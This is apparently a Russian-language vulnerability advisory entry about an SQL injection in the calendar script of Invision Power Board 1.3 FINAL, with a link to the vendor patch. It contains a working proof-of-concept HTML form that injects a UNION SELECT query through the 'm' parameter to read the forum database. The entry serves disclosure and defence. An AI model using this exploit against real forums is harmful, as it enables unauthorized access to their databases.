Дата публикации: | 05.01.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 21621 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Invision Power Board 1.3 FINAL
Описание: Уязвимость в проверке правильности входных данных обнаружена в Invision Power Board. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных. Уязвимость обнаружена в сценарии sources/calendar.php в параметре 'request'. Пример/Эксплоит: <html> <head><title> Invision Power Board Free 1.3 FINAL SQL Injection Problems </title></head> <body> <form action='/index.php?act=calendar' method='post' onsubmit="this.m.value='2 )) UNION '+this.request.value+'#';this.action=this.url.value+this.action;"> <b>IPB directory URL :</b> <input type='text' size='45' name='url' value='http://forum.target.com'><br><br> <b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request' value='SELECT * FROM ibf_calendar_events'><br><br> <u>Attention :</u> The request result MUST have this structure :<br><br> INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT, INT,INT,STR,STR<br><br> <input type='hidden' name='y' value='2004'> <input type='hidden' name='m'> <input type='submit' value='Execute'> </form> <br><br><br> <p align="right">A patch can be found on <a href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br> For more informations about this exploit : <a href="http://www.security-corporation.com/advisories-025.html" target="_blank"> Security-Corporation.com</a></p> </body> </html> URL производителя: http://www.invisionboard.com Решение:Установите исправление1.3 Security Patch 02-01-04: http://www.invisionboard.com/download/index.php |
|
Ссылки: | [Full-Disclosure] [SCSA-025] Invision Power Board SQL Injection Vulnerability |